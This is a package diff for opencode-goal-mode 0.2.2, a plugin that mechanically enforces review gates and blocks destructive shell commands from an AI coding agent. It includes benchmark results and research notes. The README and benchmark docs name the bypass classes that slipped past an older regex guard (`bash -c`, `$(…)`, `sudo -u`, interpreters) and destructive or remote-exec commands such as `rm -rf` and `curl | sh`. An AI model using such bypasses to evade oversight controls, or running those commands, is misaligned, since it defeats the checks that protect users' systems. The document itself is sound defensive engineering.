opencode-goal-mode 0.2.1 → 0.2.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/CHANGELOG.md ADDED
@@ -0,0 +1,8 @@
1
+ # Changelog
2
+
3
+ ## v0.2.2
4
+
5
+ - Refresh source-backed research notes for OpenCode plugin/runtime facts and the Claude Code/Codex comparison.
6
+ - Regenerate benchmark results and charts from the current shell-guard corpus.
7
+ - Scope benchmark and safety claims to avoid overclaiming beyond the tested bypass corpus.
8
+ - Align release documentation with the `NPM_TOKEN`-based publish workflow.
package/README.md CHANGED
@@ -14,7 +14,8 @@ Most "goal mode" / agentic setups are **prompt-only**: the model is *asked* to
14
14
  review its work and to keep going until done. Goal Mode adds a guard plugin that
15
15
  makes that discipline **mechanical at the harness layer** — the model cannot
16
16
  declare `Goal Completed` until the required reviews actually passed, and it
17
- cannot run a destructive command that a regex guard would miss.
17
+ is blocked from the benchmarked destructive-command bypasses that a regex guard
18
+ would miss.
18
19
 
19
20
  ![Mechanically-enforced goal discipline vs. Claude Code and Codex](docs/benchmarks/capability-matrix.svg)
20
21
 
@@ -29,8 +30,8 @@ honest caveats, in [research/goal-mode-comparison.md](research/goal-mode-compari
29
30
  code review is advisory.
30
31
  - **An edit automatically invalidates prior approvals.** A reviewer gate counts
31
32
  only when its PASS is newer (by a monotonic integer sequence) than the last
32
- edit — so any change forces the relevant reviews to re-run. Neither Claude Code
33
- nor Codex ships this stale-review invariant.
33
+ edit — so any change forces the relevant reviews to re-run. The public Claude
34
+ Code and Codex docs reviewed do not describe this stale-review invariant.
34
35
  - **Required specialist reviews are auto-selected and enforced** (security, api,
35
36
  data, performance …) from the goal text, contract, and changed files — not left
36
37
  to the model's discretion.
@@ -40,7 +41,7 @@ honest caveats, in [research/goal-mode-comparison.md](research/goal-mode-compari
40
41
  ### Benchmark: shell-guard accuracy
41
42
 
42
43
  The guard replaced a boundary-anchored regex classifier. On a labeled corpus of
43
- 71 real commands (`npm run bench`, reproducible — see
44
+ 71 real commands (`npm run bench` from a repository checkout, reproducible — see
44
45
  [research/benchmarks.md](research/benchmarks.md)):
45
46
 
46
47
  ![Destructive-command detection rate by family](docs/benchmarks/detection-by-family.svg)
@@ -54,8 +55,9 @@ The guard replaced a boundary-anchored regex classifier. On a labeled corpus of
54
55
  | Obfuscated bypasses caught (`$(…)`, `bash -c`, `sudo -u`, interpreters) | 0% | 100% |
55
56
  | Remote exec (`curl \| sh`) caught | 0% | 100% |
56
57
 
57
- The deeper analysis costs ~0.6 µs more per command (~500,000 classifications/
58
- second) — negligible for a per-tool-call guard:
58
+ The deeper analysis costs a few microseconds per command on this machine
59
+ (hundreds of thousands of classifications per second) — negligible for a
60
+ per-tool-call guard:
59
61
 
60
62
  ![Per-command analysis latency](docs/benchmarks/latency.svg)
61
63
 
@@ -200,21 +202,22 @@ opencode-goal-mode-install --global
200
202
  ```
201
203
 
202
204
  Publishing is handled by `.github/workflows/publish.yml`, which runs on Node 24
203
- with `id-token: write` for Trusted Publishing. The workflow validates the
205
+ and publishes with the `NPM_TOKEN` repository secret. The workflow validates the
204
206
  package, checks the tag matches `package.json`, verifies the version is not
205
207
  already on npm, then publishes. Manual workflow dispatch defaults to
206
208
  `npm publish --dry-run`.
207
209
 
208
- Release flow:
210
+ Release flow for a new version:
209
211
 
210
212
  ```bash
211
213
  npm version patch
212
214
  git push --follow-tags
213
215
  ```
214
216
 
215
- Then create a GitHub Release from the pushed tag (e.g. `v0.1.1`). For
216
- token-based publishing instead of Trusted Publishing, add a repository secret
217
- `NPM_TOKEN` with publish rights.
217
+ For a version that is already bumped and reviewed, commit the current tree, tag
218
+ the reviewed version (for example `v0.2.2`), push the branch and tag, then create
219
+ the GitHub Release. Ensure `NPM_TOKEN` has npm publish rights before publishing
220
+ the release.
218
221
 
219
222
  ## Goal Completion Contract
220
223
 
@@ -0,0 +1,86 @@
1
+ <svg xmlns="http://www.w3.org/2000/svg" width="760" height="496" viewBox="0 0 760 496" font-family="-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif">
2
+ <rect width="760" height="496" fill="#ffffff"/>
3
+ <text x="20" y="28" font-size="17" font-weight="700" fill="#1f2328">Mechanically-enforced goal discipline</text>
4
+ <text x="20" y="47" font-size="12" fill="#656d76">Enforced = guaranteed by the harness; Prompt-only / Partial = depends on the model or user config.</text>
5
+ <text x="374.0" y="62" font-size="12.5" font-weight="700" text-anchor="middle" fill="#1f2328">Goal Mode</text>
6
+ <text x="522.0" y="62" font-size="12.5" font-weight="700" text-anchor="middle" fill="#1f2328">Claude Code</text>
7
+ <text x="670.0" y="62" font-size="12.5" font-weight="700" text-anchor="middle" fill="#1f2328">Codex</text>
8
+ <text x="286" y="93" font-size="12" text-anchor="end" fill="#1f2328">Autonomous goal loop</text>
9
+ <rect x="304.0" y="74" width="140.0" height="30" rx="4" fill="#dbe9d5"/>
10
+ <text x="374.0" y="93" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Prompt-only</text>
11
+ <rect x="452.0" y="74" width="140.0" height="30" rx="4" fill="#d4a72c"/>
12
+ <text x="522.0" y="93" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
13
+ <rect x="600.0" y="74" width="140.0" height="30" rx="4" fill="#d4a72c"/>
14
+ <text x="670.0" y="93" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
15
+ <text x="286" y="131" font-size="12" text-anchor="end" fill="#1f2328">Review gate before “done”</text>
16
+ <rect x="304.0" y="112" width="140.0" height="30" rx="4" fill="#2da44e"/>
17
+ <text x="374.0" y="131" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
18
+ <rect x="452.0" y="112" width="140.0" height="30" rx="4" fill="#d4a72c"/>
19
+ <text x="522.0" y="131" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
20
+ <rect x="600.0" y="112" width="140.0" height="30" rx="4" fill="#dbe9d5"/>
21
+ <text x="670.0" y="131" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Prompt-only</text>
22
+ <text x="286" y="169" font-size="12" text-anchor="end" fill="#1f2328">Contextual specialist reviews</text>
23
+ <rect x="304.0" y="150" width="140.0" height="30" rx="4" fill="#2da44e"/>
24
+ <text x="374.0" y="169" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
25
+ <rect x="452.0" y="150" width="140.0" height="30" rx="4" fill="#dbe9d5"/>
26
+ <text x="522.0" y="169" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Prompt-only</text>
27
+ <rect x="600.0" y="150" width="140.0" height="30" rx="4" fill="#dbe9d5"/>
28
+ <text x="670.0" y="169" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Prompt-only</text>
29
+ <text x="286" y="207" font-size="12" text-anchor="end" fill="#1f2328">Stale-review invalidation on edit</text>
30
+ <rect x="304.0" y="188" width="140.0" height="30" rx="4" fill="#2da44e"/>
31
+ <text x="374.0" y="207" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
32
+ <rect x="452.0" y="188" width="140.0" height="30" rx="4" fill="#eaeef2"/>
33
+ <text x="522.0" y="207" font-size="11" font-weight="600" text-anchor="middle" fill="#656d76">None</text>
34
+ <rect x="600.0" y="188" width="140.0" height="30" rx="4" fill="#eaeef2"/>
35
+ <text x="670.0" y="207" font-size="11" font-weight="600" text-anchor="middle" fill="#656d76">None</text>
36
+ <text x="286" y="245" font-size="12" text-anchor="end" fill="#1f2328">Completion-claim enforcement</text>
37
+ <rect x="304.0" y="226" width="140.0" height="30" rx="4" fill="#2da44e"/>
38
+ <text x="374.0" y="245" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
39
+ <rect x="452.0" y="226" width="140.0" height="30" rx="4" fill="#d4a72c"/>
40
+ <text x="522.0" y="245" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
41
+ <rect x="600.0" y="226" width="140.0" height="30" rx="4" fill="#eaeef2"/>
42
+ <text x="670.0" y="245" font-size="11" font-weight="600" text-anchor="middle" fill="#656d76">None</text>
43
+ <text x="286" y="283" font-size="12" text-anchor="end" fill="#1f2328">Destructive-command blocking</text>
44
+ <rect x="304.0" y="264" width="140.0" height="30" rx="4" fill="#2da44e"/>
45
+ <text x="374.0" y="283" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
46
+ <rect x="452.0" y="264" width="140.0" height="30" rx="4" fill="#d4a72c"/>
47
+ <text x="522.0" y="283" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
48
+ <rect x="600.0" y="264" width="140.0" height="30" rx="4" fill="#d4a72c"/>
49
+ <text x="670.0" y="283" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
50
+ <text x="286" y="321" font-size="12" text-anchor="end" fill="#1f2328">Remote-exec (curl | sh) blocking</text>
51
+ <rect x="304.0" y="302" width="140.0" height="30" rx="4" fill="#2da44e"/>
52
+ <text x="374.0" y="321" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
53
+ <rect x="452.0" y="302" width="140.0" height="30" rx="4" fill="#d4a72c"/>
54
+ <text x="522.0" y="321" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
55
+ <rect x="600.0" y="302" width="140.0" height="30" rx="4" fill="#d4a72c"/>
56
+ <text x="670.0" y="321" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
57
+ <text x="286" y="359" font-size="12" text-anchor="end" fill="#1f2328">Enforcement state survives restart</text>
58
+ <rect x="304.0" y="340" width="140.0" height="30" rx="4" fill="#2da44e"/>
59
+ <text x="374.0" y="359" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
60
+ <rect x="452.0" y="340" width="140.0" height="30" rx="4" fill="#d4a72c"/>
61
+ <text x="522.0" y="359" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
62
+ <rect x="600.0" y="340" width="140.0" height="30" rx="4" fill="#d4a72c"/>
63
+ <text x="670.0" y="359" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
64
+ <text x="286" y="397" font-size="12" text-anchor="end" fill="#1f2328">State survives compaction</text>
65
+ <rect x="304.0" y="378" width="140.0" height="30" rx="4" fill="#2da44e"/>
66
+ <text x="374.0" y="397" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
67
+ <rect x="452.0" y="378" width="140.0" height="30" rx="4" fill="#d4a72c"/>
68
+ <text x="522.0" y="397" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
69
+ <rect x="600.0" y="378" width="140.0" height="30" rx="4" fill="#d4a72c"/>
70
+ <text x="670.0" y="397" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
71
+ <text x="286" y="435" font-size="12" text-anchor="end" fill="#1f2328">Custom enforcement hooks/tools</text>
72
+ <rect x="304.0" y="416" width="140.0" height="30" rx="4" fill="#2da44e"/>
73
+ <text x="374.0" y="435" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
74
+ <rect x="452.0" y="416" width="140.0" height="30" rx="4" fill="#2da44e"/>
75
+ <text x="522.0" y="435" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
76
+ <rect x="600.0" y="416" width="140.0" height="30" rx="4" fill="#d4a72c"/>
77
+ <text x="670.0" y="435" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
78
+ <rect x="286" y="461" width="12" height="12" rx="2" fill="#2da44e"/>
79
+ <text x="303" y="472" font-size="11.5" fill="#1f2328">Enforced</text>
80
+ <rect x="372" y="461" width="12" height="12" rx="2" fill="#d4a72c"/>
81
+ <text x="389" y="472" font-size="11.5" fill="#1f2328">Partial</text>
82
+ <rect x="451" y="461" width="12" height="12" rx="2" fill="#dbe9d5"/>
83
+ <text x="468" y="472" font-size="11.5" fill="#1f2328">Prompt-only</text>
84
+ <rect x="558" y="461" width="12" height="12" rx="2" fill="#eaeef2"/>
85
+ <text x="575" y="472" font-size="11.5" fill="#1f2328">None</text>
86
+ </svg>
@@ -0,0 +1,37 @@
1
+ <svg xmlns="http://www.w3.org/2000/svg" width="720" height="380" viewBox="0 0 720 380" font-family="-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif">
2
+ <rect width="720" height="380" fill="#ffffff"/>
3
+ <text x="48" y="28" font-size="17" font-weight="700" fill="#1f2328">Destructive-command detection rate by family</text>
4
+ <text x="48" y="47" font-size="12" fill="#656d76">Higher is better. Corpus: 48 destructive commands.</text>
5
+ <line x1="48" y1="296.0" x2="700" y2="296.0" stroke="#eaeef2" stroke-width="1"/>
6
+ <text x="40" y="300.0" font-size="11" text-anchor="end" fill="#656d76">0%</text>
7
+ <line x1="48" y1="249.6" x2="700" y2="249.6" stroke="#eaeef2" stroke-width="1"/>
8
+ <text x="40" y="253.6" font-size="11" text-anchor="end" fill="#656d76">20%</text>
9
+ <line x1="48" y1="203.2" x2="700" y2="203.2" stroke="#eaeef2" stroke-width="1"/>
10
+ <text x="40" y="207.2" font-size="11" text-anchor="end" fill="#656d76">40%</text>
11
+ <line x1="48" y1="156.8" x2="700" y2="156.8" stroke="#eaeef2" stroke-width="1"/>
12
+ <text x="40" y="160.8" font-size="11" text-anchor="end" fill="#656d76">60%</text>
13
+ <line x1="48" y1="110.4" x2="700" y2="110.4" stroke="#eaeef2" stroke-width="1"/>
14
+ <text x="40" y="114.4" font-size="11" text-anchor="end" fill="#656d76">80%</text>
15
+ <line x1="48" y1="64.0" x2="700" y2="64.0" stroke="#eaeef2" stroke-width="1"/>
16
+ <text x="40" y="68.0" font-size="11" text-anchor="end" fill="#656d76">100%</text>
17
+ <rect x="56.0" y="64.0" width="96.7" height="232.0" rx="3" fill="#9aa0a6"/>
18
+ <text x="104.3" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
19
+ <rect x="160.7" y="64.0" width="96.7" height="232.0" rx="3" fill="#2da44e"/>
20
+ <text x="209.0" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
21
+ <text x="156.7" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">Classic</text>
22
+ <rect x="273.3" y="296.0" width="96.7" height="0.0" rx="3" fill="#9aa0a6"/>
23
+ <text x="321.7" y="291.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">0%</text>
24
+ <rect x="378.0" y="64.0" width="96.7" height="232.0" rx="3" fill="#2da44e"/>
25
+ <text x="426.3" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
26
+ <text x="374.0" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">Obfuscated</text>
27
+ <rect x="490.7" y="296.0" width="96.7" height="0.0" rx="3" fill="#9aa0a6"/>
28
+ <text x="539.0" y="291.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">0%</text>
29
+ <rect x="595.3" y="64.0" width="96.7" height="232.0" rx="3" fill="#2da44e"/>
30
+ <text x="643.7" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
31
+ <text x="591.3" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">Remote exec</text>
32
+ <line x1="48" y1="296" x2="700" y2="296" stroke="#d0d7de" stroke-width="1.5"/>
33
+ <rect x="48" y="344" width="12" height="12" rx="2" fill="#9aa0a6"/>
34
+ <text x="66" y="354" font-size="12" fill="#1f2328">Legacy regex guard</text>
35
+ <rect x="201.6" y="344" width="12" height="12" rx="2" fill="#2da44e"/>
36
+ <text x="219.6" y="354" font-size="12" fill="#1f2328">Goal Mode analyzer</text>
37
+ </svg>
@@ -0,0 +1,13 @@
1
+ <svg xmlns="http://www.w3.org/2000/svg" width="720" height="164" viewBox="0 0 720 164" font-family="-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif">
2
+ <rect width="720" height="164" fill="#ffffff"/>
3
+ <text x="20" y="28" font-size="17" font-weight="700" fill="#1f2328">Per-command analysis latency</text>
4
+ <text x="20" y="47" font-size="12" fill="#656d76">Microseconds to classify one command. Both are negligible for a tool-call guard.</text>
5
+ <text x="218" y="87" font-size="12" text-anchor="end" fill="#1f2328">Legacy regex guard</text>
6
+ <rect x="230" y="70" width="420" height="22" rx="3" fill="#eaeef2"/>
7
+ <rect x="230" y="70" width="202.0" height="22" rx="3" fill="#9aa0a6"/>
8
+ <text x="440.0" y="87" font-size="12" font-weight="600" fill="#1f2328">2.62 µs</text>
9
+ <text x="218" y="125" font-size="12" text-anchor="end" fill="#1f2328">Goal Mode analyzer</text>
10
+ <rect x="230" y="108" width="420" height="22" rx="3" fill="#eaeef2"/>
11
+ <rect x="230" y="108" width="300.0" height="22" rx="3" fill="#2da44e"/>
12
+ <text x="538.0" y="125" font-size="12" font-weight="600" fill="#1f2328">3.89 µs</text>
13
+ </svg>
@@ -0,0 +1,32 @@
1
+ <svg xmlns="http://www.w3.org/2000/svg" width="720" height="380" viewBox="0 0 720 380" font-family="-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif">
2
+ <rect width="720" height="380" fill="#ffffff"/>
3
+ <text x="48" y="28" font-size="17" font-weight="700" fill="#1f2328">Overall guard accuracy</text>
4
+ <text x="48" y="47" font-size="12" fill="#656d76">Detection rate (higher better) vs false-positive rate (lower better).</text>
5
+ <line x1="48" y1="296.0" x2="700" y2="296.0" stroke="#eaeef2" stroke-width="1"/>
6
+ <text x="40" y="300.0" font-size="11" text-anchor="end" fill="#656d76">0%</text>
7
+ <line x1="48" y1="249.6" x2="700" y2="249.6" stroke="#eaeef2" stroke-width="1"/>
8
+ <text x="40" y="253.6" font-size="11" text-anchor="end" fill="#656d76">20%</text>
9
+ <line x1="48" y1="203.2" x2="700" y2="203.2" stroke="#eaeef2" stroke-width="1"/>
10
+ <text x="40" y="207.2" font-size="11" text-anchor="end" fill="#656d76">40%</text>
11
+ <line x1="48" y1="156.8" x2="700" y2="156.8" stroke="#eaeef2" stroke-width="1"/>
12
+ <text x="40" y="160.8" font-size="11" text-anchor="end" fill="#656d76">60%</text>
13
+ <line x1="48" y1="110.4" x2="700" y2="110.4" stroke="#eaeef2" stroke-width="1"/>
14
+ <text x="40" y="114.4" font-size="11" text-anchor="end" fill="#656d76">80%</text>
15
+ <line x1="48" y1="64.0" x2="700" y2="64.0" stroke="#eaeef2" stroke-width="1"/>
16
+ <text x="40" y="68.0" font-size="11" text-anchor="end" fill="#656d76">100%</text>
17
+ <rect x="56.0" y="247.7" width="151.0" height="48.3" rx="3" fill="#9aa0a6"/>
18
+ <text x="131.5" y="242.7" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">21%</text>
19
+ <rect x="215.0" y="64.0" width="151.0" height="232.0" rx="3" fill="#2da44e"/>
20
+ <text x="290.5" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
21
+ <text x="211.0" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">Detection rate</text>
22
+ <rect x="382.0" y="245.6" width="151.0" height="50.4" rx="3" fill="#9aa0a6"/>
23
+ <text x="457.5" y="240.6" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">22%</text>
24
+ <rect x="541.0" y="296.0" width="151.0" height="0.0" rx="3" fill="#2da44e"/>
25
+ <text x="616.5" y="291.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">0%</text>
26
+ <text x="537.0" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">False-positive rate</text>
27
+ <line x1="48" y1="296" x2="700" y2="296" stroke="#d0d7de" stroke-width="1.5"/>
28
+ <rect x="48" y="344" width="12" height="12" rx="2" fill="#9aa0a6"/>
29
+ <text x="66" y="354" font-size="12" fill="#1f2328">Legacy regex guard</text>
30
+ <rect x="201.6" y="344" width="12" height="12" rx="2" fill="#2da44e"/>
31
+ <text x="219.6" y="354" font-size="12" fill="#1f2328">Goal Mode analyzer</text>
32
+ </svg>
@@ -0,0 +1,77 @@
1
+ {
2
+ "corpusSize": 71,
3
+ "destructiveCount": 48,
4
+ "safeCount": 23,
5
+ "legacy": {
6
+ "detectionRate": 20.833333333333336,
7
+ "falsePositiveRate": 21.73913043478261,
8
+ "destCaught": 10,
9
+ "destTotal": 48,
10
+ "safeFalsePos": 5,
11
+ "safeTotal": 23,
12
+ "families": {
13
+ "classic": {
14
+ "destTotal": 10,
15
+ "destCaught": 10,
16
+ "safeTotal": 0,
17
+ "safeFalsePos": 0
18
+ },
19
+ "bypass": {
20
+ "destTotal": 35,
21
+ "destCaught": 0,
22
+ "safeTotal": 0,
23
+ "safeFalsePos": 0
24
+ },
25
+ "remote-exec": {
26
+ "destTotal": 3,
27
+ "destCaught": 0,
28
+ "safeTotal": 0,
29
+ "safeFalsePos": 0
30
+ },
31
+ "safe": {
32
+ "destTotal": 0,
33
+ "destCaught": 0,
34
+ "safeTotal": 23,
35
+ "safeFalsePos": 5
36
+ }
37
+ },
38
+ "opsPerSec": 381490,
39
+ "usPerCommand": 2.62
40
+ },
41
+ "current": {
42
+ "detectionRate": 100,
43
+ "falsePositiveRate": 0,
44
+ "destCaught": 48,
45
+ "destTotal": 48,
46
+ "safeFalsePos": 0,
47
+ "safeTotal": 23,
48
+ "families": {
49
+ "classic": {
50
+ "destTotal": 10,
51
+ "destCaught": 10,
52
+ "safeTotal": 0,
53
+ "safeFalsePos": 0
54
+ },
55
+ "bypass": {
56
+ "destTotal": 35,
57
+ "destCaught": 35,
58
+ "safeTotal": 0,
59
+ "safeFalsePos": 0
60
+ },
61
+ "remote-exec": {
62
+ "destTotal": 3,
63
+ "destCaught": 3,
64
+ "safeTotal": 0,
65
+ "safeFalsePos": 0
66
+ },
67
+ "safe": {
68
+ "destTotal": 0,
69
+ "destCaught": 0,
70
+ "safeTotal": 23,
71
+ "safeFalsePos": 0
72
+ }
73
+ },
74
+ "opsPerSec": 256879,
75
+ "usPerCommand": 3.89
76
+ }
77
+ }
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "opencode-goal-mode",
3
- "version": "0.2.1",
3
+ "version": "0.2.2",
4
4
  "description": "Strict Goal Mode agents, commands, and guard plugin for OpenCode.",
5
5
  "type": "module",
6
6
  "engines": {
@@ -13,9 +13,12 @@
13
13
  "files": [
14
14
  "agents/",
15
15
  "commands/",
16
+ "docs/",
16
17
  "plugins/",
18
+ "research/",
17
19
  "scripts/install.mjs",
18
20
  "ARCHITECTURE.md",
21
+ "CHANGELOG.md",
19
22
  "LICENSE",
20
23
  "README.md"
21
24
  ],
@@ -0,0 +1,18 @@
1
+ # Research
2
+
3
+ Background research that informs the Goal Mode design. These are working
4
+ references, kept so the rationale behind the plugin is auditable and the
5
+ platform facts are recoverable. They are shipped as reference docs so README
6
+ links resolve in the npm package, but they are not runtime files.
7
+
8
+ | Document | What it covers |
9
+ | --- | --- |
10
+ | [opencode-plugin-platform.md](opencode-plugin-platform.md) | Verified OpenCode plugin-runtime facts (hooks, discovery, permissions, tools) from `@opencode-ai/plugin@1.15.13` source. The pinned runtime reference the plugin is built against. |
11
+ | [goal-mode-comparison.md](goal-mode-comparison.md) | How Goal Mode's mechanical enforcement compares to Claude Code and OpenAI Codex, with citations and honest caveats. |
12
+ | [shell-hardening.md](shell-hardening.md) | The shell-analyzer threat model: the bypass classes the old regex guard missed and how the tokenizer closes each. |
13
+ | [benchmarks.md](benchmarks.md) | Benchmark methodology and results (detection rate, false positives, latency). Reproduce with `npm run bench`. |
14
+
15
+ Every non-obvious platform claim in these documents was verified against the
16
+ installed `@opencode-ai/plugin` type definitions and/or the `sst/opencode`
17
+ source at tag `v1.15.13`. Where a fact is version-specific (e.g. the dormant
18
+ `permission.ask` hook) it is called out as such.
@@ -0,0 +1,63 @@
1
+ # Benchmarks
2
+
3
+ Reproducible measurement of the destructive-command guard from a repository
4
+ checkout. Run:
5
+
6
+ ```bash
7
+ npm run bench # detection / false-positive / latency benchmark
8
+ npm run bench:compare # regenerate the capability-comparison chart
9
+ ```
10
+
11
+ `npm run bench` writes `docs/benchmarks/results.json` and the SVG charts the
12
+ README embeds.
13
+
14
+ ## Methodology
15
+
16
+ - **Corpus** (`benchmarks/corpus.mjs`): 71 real shell commands a coding agent
17
+ might emit, each labeled `destructive` (a guard must block) or `safe` (a guard
18
+ must not block). Split into families: *classic* (plain `rm -rf`, `git reset
19
+ --hard`), *obfuscated* (the bypass corpus — substitutions, wrappers, `bash -c`,
20
+ interpreters, weaponized git), *remote-exec* (`curl | sh`), and *safe*
21
+ (read-only and quoted-text commands, including ones the old guard
22
+ false-positived).
23
+ - **Baseline** (`benchmarks/legacy-analyzer.mjs`): the original regex classifier,
24
+ preserved **verbatim** from the first published release (commit `130956d`), so
25
+ the comparison is apples-to-apples against the same code that shipped.
26
+ - **A command counts as "blocked"** when the analyzer flags it `destructive` or
27
+ `networkExec` (the two signals `tool.execute.before` throws on). `mutating`
28
+ marks the session dirty but does not block, so it is not counted here.
29
+ - **Metrics**: detection rate (recall over destructive commands),
30
+ false-positive rate (safe commands wrongly blocked), and per-command latency.
31
+
32
+ ## Results
33
+
34
+ Representative run (Node 22, single-threaded; latency varies by machine, the
35
+ accuracy figures do not):
36
+
37
+ | Metric | Legacy regex guard | Goal Mode analyzer |
38
+ | --- | --- | --- |
39
+ | Detection rate | **20.8%** (10/48) | **100%** (48/48) |
40
+ | False-positive rate | **21.7%** (5/23) | **0%** (0/23) |
41
+ | Detection — classic | 100% | 100% |
42
+ | Detection — obfuscated | 0% (0/35) | 100% (35/35) |
43
+ | Detection — remote-exec | 0% (0/3) | 100% (3/3) |
44
+ | Latency per command | ~2.3 µs | ~3.8 µs |
45
+
46
+ The legacy guard catches only the *classic* family and misses every obfuscated
47
+ and remote-execution command, while wrongly blocking 1-in-5 benign commands. The
48
+ tokenizer catches the entire corpus with zero false positives, for an extra
49
+ ~1.5 µs per command on this run — negligible for a per-tool-call guard (still
50
+ hundreds of thousands of classifications per second).
51
+
52
+ ## Honesty notes
53
+
54
+ - The corpus is hand-built to exercise the known bypass classes; it is a
55
+ capability benchmark, not a claim of catching *every* possible obfuscation
56
+ (the analyzer fails open on un-analyzable dynamic commands — see
57
+ [shell-hardening.md](shell-hardening.md)).
58
+ - The latency comparison is intentionally shown even though the new analyzer is
59
+ slower: the win is accuracy, and the parse cost is still only a few
60
+ microseconds per tool-call candidate.
61
+ - "100% on this corpus" means 100% of the labeled set; new bypass classes that
62
+ are discovered get added to the corpus and fixed (that is how the second-wave
63
+ findings — `sudo -u`, `pnpm dlx`, interpreter shell-out — entered it).
@@ -0,0 +1,100 @@
1
+ # Goal Mode vs. Claude Code vs. Codex
2
+
3
+ How OpenCode Goal Mode's **mechanically-enforced** goal discipline compares to
4
+ Anthropic's Claude Code and OpenAI's Codex. Sourced from Claude Code docs
5
+ (`https://docs.anthropic.com/en/docs/claude-code/hooks` and `/security`) and
6
+ OpenAI Codex docs (`https://developers.openai.com/codex/cli` and `/cloud`),
7
+ cross-checked against this plugin's source. The emphasis throughout is
8
+ *mechanical enforcement* — what the harness guarantees — versus *prompt-driven*
9
+ behavior the model is asked to do.
10
+
11
+ ## The distinction that matters
12
+
13
+ All three tools run a **model-driven** agentic loop. Public docs reviewed do not
14
+ describe a default mechanical proof that forces the model to keep working until
15
+ all project-specific acceptance criteria are externally verified. Goal Mode's
16
+ loop is prompt-only too.
17
+
18
+ What separates the three is what happens at the **completion boundary** and the
19
+ **tool boundary**:
20
+
21
+ - **Claude Code** has the richest first-party *mechanical* surface
22
+ (PreToolUse/Stop/PostToolUse hooks, permission deny rules, sandboxing) — but
23
+ review and completion enforcement are **opt-in**, requiring user-authored
24
+ hooks. Out of the box, review is prompt-driven and the model stops when it
25
+ judges the work done.
26
+ - **Codex** has approval modes, local code review, and cloud environments that
27
+ isolate work from the user's machine — genuinely strong mode-level boundaries
28
+ Goal Mode does not claim — but public docs do not describe a harness-level
29
+ `Goal Completed` blocker or stale-review invalidation invariant.
30
+ - **Goal Mode** ships a coherent **completion contract** and **command guard**
31
+ enforced at the harness layer by default, for the goal-completion use case.
32
+
33
+ ## Capability matrix
34
+
35
+ See `docs/benchmarks/capability-matrix.svg` for the visual. Levels: **Enforced**
36
+ (guaranteed by the harness), **Partial** (possible but opt-in / mode-level),
37
+ **Prompt-only** (the model's judgment), **None**.
38
+
39
+ | Capability | Goal Mode | Claude Code | Codex |
40
+ | --- | --- | --- | --- |
41
+ | Autonomous goal loop | Prompt-only | Partial | Partial |
42
+ | Review gate before "done" | **Enforced** | Partial (Stop hook) | Prompt-only |
43
+ | Contextual specialist reviews | **Enforced** | Prompt-only | Prompt-only |
44
+ | Stale-review invalidation on edit | **Enforced** | None | None |
45
+ | Completion-claim enforcement | **Enforced** | Partial (Stop hook) | None |
46
+ | Destructive-command blocking | **Enforced** (tokenizer) | Partial ("fragile") | Partial (sandbox) |
47
+ | Remote-exec (`curl \| sh`) blocking | **Enforced** | Partial | Partial (sandbox) |
48
+ | Enforcement state survives restart | **Enforced** | Partial (transcript) | Partial (transcript) |
49
+ | State survives compaction | **Enforced** | Partial | Partial |
50
+ | Custom enforcement hooks/tools | **Enforced** | **Enforced** | Partial |
51
+
52
+ ## Where Goal Mode is uniquely strong
53
+
54
+ 1. **Mechanical completion contract.** Goal Mode intercepts the finished
55
+ assistant message (`experimental.text.complete`) and rewrites a premature
56
+ `Goal Completed` to `Goal Not Completed` unless the message *starts with* the
57
